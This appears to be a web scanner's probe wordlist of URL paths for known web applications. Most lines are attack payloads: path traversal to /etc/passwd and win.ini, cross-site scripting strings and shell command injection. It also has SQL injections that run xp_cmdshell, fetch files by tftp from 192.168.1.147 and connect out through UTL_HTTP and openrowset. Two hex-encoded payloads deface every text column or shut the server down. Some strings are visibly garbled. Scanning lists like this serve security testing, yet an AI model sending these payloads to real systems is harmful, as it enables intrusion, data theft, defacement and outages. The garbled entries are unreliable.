/helplt4.nsf
/helplt4.nsf/?OpenDatabase
/helpout.exe
/help_text_vars.php?PGV_BASE_DIRECTORY=../../../../../../../../../etc/passwd
/hidden.nsf
/hidden.nsf/?OpenDatabase
/hidden/
/hide/
/hilfe.php?chapter=%22%2Bonmouseover%3Dalert%28xss%29%2B
/hints.cgi
/hints.pl
/hints/hints.cgi
/hints/hints.pl
/hippa/
/hire
/hire/
/history/
/hit.php
/hitmatic
/hitmatic/
/hitmatic/analyse.cgi
/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/hits.txt
/hitview.cgi
/hit_matic/
/hit_tracker
/hit_tracker/
/hlstats.php/%3e%22%3e%3cscript%3ealert(xss)%3c%2fscript%3e
/hlstats.php?mode=admin&act_sort=description&act_sortorder=asc&weap_sort=code&weap_sortorder=asc
/hlstats/
/hobbit.txt
/home
/home.nsf/<img%20src=%22javascriptt(xss)%22>
/home.php?action=results&poll_id=-9999%27
/home.php?arsc_language=elvish
/home/
/home/rss.php/</a>%3Cscript%3Ealert(xss)%3C/script%3E
/homebet/
/homebet/homebet.dll
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/homejunk.aspx
/homepage.nsf
/homepage.nsf/$defaultnav
/homepage.nsf/?OpenDatabase
/homepage/
/homes/
/horde/
/horde/admin/css/index.php?file=../../../../../../../../../etc/passwd
/horde/imp/test.php
/horde/test.php
/horde/test.php?mode=phpinfo
/host/
/Hosting/sqlbrowse.asp?filepath=c:\&Opt=3
/hostingcontroller
/hostingcontroller/
/hostingcontroller/adminsettings/browsedisk.asp
/hostingcontroller/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
/hostingcontroller/adminsettings/browsewebalizerexe.asp
/hostingcontroller/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
/hostingcontroller/autosignup/dsp_newwebadmin.asp
/hostingcontroller/serv_u/servubrowse.asp
/hostingcontroller/serv_u/servubrowse.asp?filepath=c:\&Opt=3
/HostingController/sqlbrowse.asp?filepath=c:\&Opt=3
/hostingcontroller/SQLServ/sqlbrowse.asp
/hostingcontroller/stats/statsbrowse.asp
/hostingcontroller/stats/statsbrowse.asp?filepath=c:\&Opt=3
/hosts/
/howitworks
/howitworks/
/howto/
/hsx
/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
/hsx/classifieds.hsx?db=%22%3Cscript%3Ealert(1)%3C/script%3E%3C%22
/ht/
/htaccess
/htaccess.php?plan_id=%27
/htaccess.php?plan_id=35&domain=%27
/htaccess/
/htaccess/dohtaccess.html?dir=%3E%3Cscript%3Ealert(xss)%3C/script%3E
/htbin/
/htbin/admin/classes/minixml/classes/doc.inc.php
/htbin/admin/classes/minixml/classes/element.inc.php
/htbin/admin/classes/minixml/classes/node.inc.php
/htbin/mailfile.cgi
/htdata
/htdata/
/htdoc/
/htdocs
/htdocs/
/htdocs/../../../../../../../../../../../../etc/passwd
/htdocs/index.html.ca
/htdocs/index.html.cz.iso8859-2
/htdocs/index.html.de
/htdocs/index.html.dk
/htdocs/index.html.ee
/htdocs/index.html.el
/htdocs/index.html.en
/htdocs/index.html.es
/htdocs/index.html.et
/htdocs/index.html.fr
/htdocs/index.html.nl
/htdocs/index.html.nn
/htdocs/index.html.no
/htdocs/index.html.se
/htdocs/index.html.tw
/htdocs/index.html.var
/htdocs/manual
/htdocs/_vti_pvt/service.pwd
/htgrep.cgi
/htgrep/file=index.html&hdr=/etc/passwd
/htgrep?file=index.html&hdr=/etc/passwd
/htimage.exe
/htimage.exe?2,2
/htm/
/html
/html/
/html/?PageServices
/html/cgi-bin/cgicso?query=
/html/cgi-bin/cgicso?query=AAA
/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert('vulnerable');</script>
/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=5&title=%253cscript%3Ealert%2528document.cookie);%253c/script%3E
/html/modules/Xanthia/pnuserapi.php
/html/partner.php?mainfile=anything&Default_Theme='<script>alert('vulnerable');</script>
/html/snort2html.html
/htmldocs/
/htmlscript
/htmlscript?../../../../../../../../../../etc/passwd
/html_page?TEMPLATE=main
/html_web_store.cgi
/htpass/
/htpasswd
/htpasswd/
/htpasswd2
/htpasswrd/
/htsearch
/htsearch?-c/etc/passwd
/htsearch?-c/nonexistant
/htsearch?config=../../../../../../../../../../etc/passwd
/htsearch?config=htdig;words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
/htsearch?exclude=%60/etc/passwd%60
/htsrv/login.php?redirect_to=%22onmouseover=%22alert(xss)
/HTTP
/http/
/HTTP1.0/
/http:/
/httpacl/
/httpext.dll
/httpodbc.dll
/https-admserv/
/https-admserv/bin/status
/ht_root/wwwroot/-/local/httpd$map.conf
/hv/ecdis/pages.php?idpages='
/hv/ecdis/products1.php?id=6&id2='&subcat=Asus&p=products1
/hwadmin5340/
/Hyperstat/
/hyperstat/stat_what.log
/h_goster.asp?id='
/I
/i-build/
/i-mall/
/i-mall/i-mall.cgi?p=|id|
/i/
/iart.php?text=%22%3E%3E%3C%3C%3E%3E%22%27%27%3Cscript%3Ealert%2810726%29%3C%2Fscript%3E
/ibank/
/ibill
/ibill/
/ibill/cgi/SiteAdmin.pl
/ibillpm.pl
/ibi_html/
/ibi_html/workbnch/wbdadmin.htm
/IBMWebAS/
/IBMWebAS/help/secure.htm
/IBMWebAS/InfoCenter/
/icat
/icat.pl
/iconboard/register.cgi?SEND_MAIL=/bin/ls
/icons"><script>alert(097531);</script>
/icons-
/icons-old
/icons.
/icons.-old
/icons.0
/icons.000
/icons.1
/icons.2
/icons.3
/icons.4
/icons.5
/icons.6
/icons.7
/icons.8
/icons.9
/icons.arc
/icons.bac
/icons.backup
/icons.bak
/icons.bckp
/icons.BKP
/icons.bkup
/icons.bz2
/icons.diff
/icons.gz
/icons.inc
/icons.las
/icons.lnk
/icons.log
/icons.lst
/icons.o
/icons.old
/icons.old-
/icons.old0
/icons.old1
/icons.old2
/icons.old3
/icons.old4
/icons.old5
/icons.old6
/icons.old7
/icons.old8
/icons.old9
/icons.orig
/icons.sav
/icons.save
/icons.saved
/icons.tar
/icons.temp
/icons.tgz
/icons.tmp
/icons.txt
/icons.Z
/icons.zip
/icons.~1
/icons.~bk
/icons/
/icons/%00/
/icons/%2e%2e/%2e%2e/%00.jsp
/icons/%2E/
/icons/%2E/%00/
/icons/%2E/%2e%2e/%2e%2e/%00.jsp
/icons/%2E/%2E.ace
/icons/%2E/%2E.arj
/icons/%2E/%2E.gz
/icons/%2E/%2E.lha
/icons/%2E/%2E.lzh
/icons/%2E/%2E.rar
/icons/%2E/%2E.sln
/icons/%2E/%2E.tar
/icons/%2E/%2E.zip
/icons/%2E/%2E/
/icons/%2E/%2F/
/icons/%2E/%5C/
/icons/%2E/.README
/icons/%2E//%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/%2E//%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/%2E//?>'"><script>alert(xss)</script>
/icons/%2E/123%0a%0a%3ealert(xss)%3b%3c/script%3e123.jsp
/icons/%2E/<oot.ini
/icons/%2E/>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/%2E/?>'"><script>alert(xss)</script>
/icons/%2E/?C=
/icons/%2E/?C="
/icons/%2E/?C="'><A%20HREF="/WF_XSRF.html">Injected%20Link</A>
/icons/%2E/?C="'><IMG%20SRC="/WF_XSRF.html">
/icons/%2E/?C="></IFRAME><script>alert(xss)</script>
/icons/%2E/?C="></style><script>alert(xss)</script>
/icons/%2E/?C="></STYLE><STYLE>@import"javascriptt(xss)";</STYLE>
/icons/%2E/?C="></title><script>alert(xss)</script>
/icons/%2E/?C=%00
/icons/%2E/?C=%20onMouseOver=alert(xss)>
/icons/%2E/?C=%22%20%7C%20%22id
/icons/%2E/?C=%22%20%7C%20%22vol
/icons/%2E/?C=%22%20onMouseOver=alert(xss)>
/icons/%2E/?C=%22%20style%3D%22backgroundession(alert(xss))%22%20OA%3D%22
/icons/%2E/?C=%22%27
/icons/%2E/?C=%26%26id
/icons/%2E/?C=%26%26vol
/icons/%2E/?C=%27%20%7C%20%27id
/icons/%2E/?C=%27%20%7C%20%27vol
/icons/%2E/?C=%27%22%3E%3Cscript%3Ealert(xss)%3C%2Fscript%3E
/icons/%2E/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/%2E/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/%2E/?C=%7C%7Cid
/icons/%2E/?C=%7C%7Cvol
/icons/%2E/?C=%7Cid
/icons/%2E/?C=%7Cvol
/icons/%2E/?C=%A7%A2%BE%BC%F3%E3%F2%E9%F0%F4%BE%E1%EC%E5%F2%F4%A848547%A9%BC%AF%F3%E3%F2%E9%F0%F4%BE
/icons/%2E/?C='
/icons/%2E/?C='"><iframe%20src=javascriptt(xss)>
/icons/%2E/?C='%20+%20''%20+%20'N;O=D
/icons/%2E/?C='%20onMouseOver=alert(xss)>
/icons/%2E/?C='%20||%20'N;O=D
/icons/%2E/?C=)
/icons/%2E/?C=--><script>alert(xss)</script>
/icons/%2E/?C=../../../../../../bin/id|
/icons/%2E/?C=../../../../../../usr/bin/id|
/icons/%2E/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
/icons/%2E/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/icons/%2E/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/icons/%2E/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini
/icons/%2E/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/icons/%2E/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/icons/%2E/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/icons/%2E/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/icons/%2E/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/icons/%2E/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/icons/%2E/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/icons/%2E/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../boot.ini
/icons/%2E/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/icons/%2E/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini
/icons/%2E/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/icons/%2E/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini
/icons/%2E/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/icons/%2E/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../boot.ini
/icons/%2E/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/icons/%2E/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini
/icons/%2E/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../boot.ini
/icons/%2E/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/icons/%2E/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini
/icons/%2E/?C=/../../../../../../../../boot.ini
/icons/%2E/?C=/../../../../../../../../etc/passwd
/icons/%2E/?C=/../../../../../../../../windows/win.ini
/icons/%2E/?C=/../../../../../../../../winnt/win.ini
/icons/%2E/?C=;
/icons/%2E/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/%2E/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/%2E/?C=;vol|
/icons/%2E/?C=</TextArea><script>alert(xss)</script>
/icons/%2E/?C=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(xss)>
/icons/%2E/?C=>"><%00script>alert(xss)</script>
/icons/%2E/?C=>"><script>alert(xss)</script>
/icons/%2E/?C=>%22%27><img%20src%3d%22javascriptt(xss)%22>
/icons/%2E/?C=>'><%00script>alert(xss)</script>
/icons/%2E/?C=>'><script>alert(xss)</script>
/icons/%2E/?C=>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/%2E/?C=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/%2E/?C=AVAK$(RETURN_CODE)OS
/icons/%2E/?C=Cdows\win.ini
/icons/%2E/?C=Cnt\win.ini
/icons/%2E/?C=Ct.ini
/icons/%2E/?C=D;O=A
/icons/%2E/?C=id|
/icons/%2E/?C=M;O=A
/icons/%2E/?C=N;O=D
/icons/%2E/?C=N;O=D"+alert(xss)+"
/icons/%2E/?C=N;O=D#&<(,+">;
/icons/%2E/?C=N;O=D%22%2Balert%2848539%29%2B%22
/icons/%2E/?C=N;O=D%27%2Balert%2848535%29%2B%27
/icons/%2E/?C=N;O=D%2Balert%2848543%29%2B
/icons/%2E/?C=N;O=D%a5'%20having%201=1--
/icons/%2E/?C=N;O=D%uFF07
/icons/%2E/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2848435%29%3C%2Fscript%3E=123
/icons/%2E/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2848439%29%3C%2Fscript%3E=123
/icons/%2E/?C=N;O=D'
/icons/%2E/?C=N;O=D'"WFXSSProbe)/>
/icons/%2E/?C=N;O=D'%20+%20'somechars
/icons/%2E/?C=N;O=D'%20and%20'barfoo'='foobar
/icons/%2E/?C=N;O=D'%20and%20'barfoo'='foobar'%20--
/icons/%2E/?C=N;O=D'%20and%20'barfoo'='foobar')%20--
/icons/%2E/?C=N;O=D'%20and%20'foobar'='foobar
/icons/%2E/?C=N;O=D'%20and%20'foobar'='foobar'%20--
/icons/%2E/?C=N;O=D'%20and%20'foobar'='foobar')%20--
/icons/%2E/?C=N;O=D'%20exec%20master..xp_cmdshell%20'vol'--
/icons/%2E/?C=N;O=D'%20having%201=1--
/icons/%2E/?C=N;O=D'%20or%20'foobar'='foobar
/icons/%2E/?C=N;O=D'%20or%20'foobar'='foobar'%20--
/icons/%2E/?C=N;O=D'%20or%20'foobar'='foobar')%20--
/icons/%2E/?C=N;O=D'%20||%20'somechars
/icons/%2E/?C=N;O=D'%20||%20UTL_HTTP.REQUEST('http2.168.1.147QL_Injection_Validation')%20||%20'
/icons/%2E/?C=N;O=D'+alert(xss)+'
/icons/%2E/?C=N;O=D';
/icons/%2E/?C=N;O=D';%20exec%20master..xp_cmdshell%20'tftp%20192.168.1.147%20GET%20SQL_Injection_Validation'--
/icons/%2E/?C=N;O=D';%20select%20*%20from%20dbo.sysdatabases--
/icons/%2E/?C=N;O=D';%20select%20*%20from%20master..sysmessages--
/icons/%2E/?C=N;O=D';%20select%20*%20from%20openrowset('sqloledb','Network=DBMSSOCN;Address=192.168.1.147,9999;uid=myUsr;pwd=myPass;timeout=5','select%20foo%20from%20bar')--
